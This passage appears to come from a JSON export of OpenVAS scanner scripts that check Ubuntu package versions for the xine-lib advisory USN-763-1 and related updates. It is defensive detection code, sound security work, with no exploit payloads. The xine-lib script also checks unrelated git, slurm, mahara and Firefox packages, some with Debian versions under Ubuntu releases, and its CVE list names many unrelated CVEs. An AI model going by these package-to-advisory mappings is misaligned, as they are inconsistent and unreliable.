report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ipsec-tools\", ver:\"0.7.1-1.3+lenny2\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-doc\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-server\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-simple\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntpdate\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-refclock\", ver:\"4.2.0a+stable-8.1ubuntu6.2\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-doc\", ver:\"4.2.4p4+dfsg-6ubuntu2.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp\", ver:\"4.2.4p4+dfsg-6ubuntu2.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntpdate\", ver:\"4.2.4p4+dfsg-6ubuntu2.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp-doc\", ver:\"4.2.4p4+dfsg-7ubuntu5.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntp\", ver:\"4.2.4p4+dfsg-7ubuntu5.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ntpdate\", ver:\"4.2.4p4+dfsg-7ubuntu5.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:28:23", "bulletinFamily": "scanner", "description": "The remote 
host is missing an update to xine-lib\nannounced via advisory USN-763-1.", "modified": "2017-12-01T00:00:00", "published": "2009-06-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64143", "id": "OPENVAS:64143", "title": "Ubuntu USN-763-1 (xine-lib)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_763_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_763_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-763-1 (xine-lib)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n libxine-main1 1.1.1+ubuntu2-7.12\n\nUbuntu 8.04 LTS:\n libxine1 1.1.11.1-1ubuntu3.4\n\nUbuntu 8.10:\n libxine1 1.1.15-0ubuntu3.3\n\nAfter a standard system upgrade you need to restart applications linked\nagainst xine-lib, such as Totem-xine and Amarok, to effect the necessary\nchanges.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-763-1\";\n\ntag_insight = \"It was discovered that the QT demuxer in xine-lib did not correctly handle\na large count value in an STTS atom, resulting in a heap-based buffer\noverflow. If a user or automated system were tricked into opening a\nspecially crafted MOV file, an attacker could execute arbitrary code as the\nuser invoking the program. (CVE-2009-1274)\n\nUSN-746-1 provided updated xine-lib packages to fix multiple security\nvulnerabilities. The security patch to fix CVE-2009-0698 was incomplete.\nThis update corrects the problem.\n\nOriginal advisory details:\n It was discovered that the 4xm demuxer in xine-lib did not correctly\n handle a large current_track value in a 4xm file, resulting in an integer\n overflow. If a user or automated system were tricked into opening a\n specially crafted 4xm movie file, an attacker could crash xine-lib or\n possibly execute arbitrary code with the privileges of the user invoking\n the program. 
(CVE-2009-0698)\";\ntag_summary = \"The remote host is missing an update to xine-lib\nannounced via advisory USN-763-1.\";\n\n \n\n\nif(description)\n{\n script_id(64143);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-0698\", \"CVE-2009-1274\", \"CVE-2009-0991\", \"CVE-2009-1357\", \"CVE-2009-1301\", \"CVE-2009-0664\", \"CVE-2008-3963\", \"CVE-2008-2079\", \"CVE-2008-4097\", \"CVE-2008-4098\", \"CVE-2008-4456\", \"CVE-2009-0652\", \"CVE-2009-1302\", \"CVE-2009-1303\", \"CVE-2009-1304\", \"CVE-2009-1305\", \"CVE-2009-1306\", \"CVE-2009-1307\", \"CVE-2009-1308\", \"CVE-2009-1309\", \"CVE-2009-1310\", \"CVE-2009-1311\", \"CVE-2009-1312\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-763-1 (xine-lib)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-763-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"1.1.1+ubuntu2-7.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-main1\", ver:\"1.1.1+ubuntu2-7.12\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-doc\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-all-plugins\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-plugins\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-bin\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-console\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-dbg\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-misc-plugins\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-x\", 
ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-ffmpeg\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-gnome\", ver:\"1.1.11.1-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-doc\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-all-plugins\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-plugins\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-bin\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-console\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-dbg\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-ffmpeg\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-gnome\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-misc-plugins\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1-x\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1\", ver:\"1.1.15-0ubuntu3.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"git-arch\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-doc\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitweb\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-svn\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitk\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-email\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-core\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-gui\", ver:\"1.5.6.5-3+lenny1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"slurm-llnl-doc\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpmi0-dev\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"slurm-llnl\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"slurm-llnl-slurmdbd\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpmi0\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"slurm-llnl-sview\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libslurm13\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n 
report += res;\n}\nif ((res = isdpkgvuln(pkg:\"slurm-llnl-basic-plugins-dev\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libslurm13-dev\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"slurm-llnl-basic-plugins\", ver:\"1.3.6-1lenny3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mahara\", ver:\"1.0.4-4+lenny2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mahara-apache2\", ver:\"1.0.4-4+lenny2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-venkman\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif 
((res = isdpkgvuln(pkg:\"firefox-granparadiso-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-libthai\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-venkman\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dom-inspector\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-venkman\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0\", ver:\"3.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dev\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"xulrunner-1.9-gnome-support\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"abrowser\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-venkman\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", 
rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-libthai\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-venkman\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dom-inspector\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-venkman\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"abrowser-3.0-branding\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-branding\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0\", ver:\"3.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dev\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"xulrunner-1.9-gnome-support\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-dev\", ver:\"1.9.0.9+nobinonly-0ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"abrowser\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dev\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-3.0-venkman\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", 
rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-granparadiso\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-libthai\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-dom-inspector\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-gnome-support\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk-venkman\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"firefox-trunk\", ver:\"3.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-dom-inspector\", ver:\"1.9.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-1.9-venkman\", ver:\"1.9.0.9+nobinonly-0ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"abrowser-3.0-branding\", 